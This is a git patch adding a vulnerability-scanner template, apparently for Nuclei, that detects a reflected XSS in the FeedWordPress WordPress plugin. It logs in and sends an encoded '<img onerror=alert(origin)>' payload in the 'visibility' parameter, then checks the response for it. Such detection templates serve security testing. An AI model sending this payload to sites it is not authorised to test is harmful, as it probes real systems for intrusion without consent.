From a13bb3fa4ef0149f8c4a3a8511830ea3a00d73d5 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sat, 19 Feb 2022 16:48:05 +0530
Subject: [PATCH] Create feedwordpress-xss.yaml

---
 .../wordpress/feedwordpress-xss.yaml          | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 vulnerabilities/wordpress/feedwordpress-xss.yaml

diff --git a/vulnerabilities/wordpress/feedwordpress-xss.yaml b/vulnerabilities/wordpress/feedwordpress-xss.yaml
new file mode 100644
index 0000000000..3a8df420ec
--- /dev/null
+++ b/vulnerabilities/wordpress/feedwordpress-xss.yaml
@@ -0,0 +1,40 @@
+id: feedwordpress-xss
+
+info:
+  name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
+  reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
+  tags: wordpress,wp-plugin,xss,feedwordpress
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28origin%29%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<img+src=2+onerror=alert(origin)>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200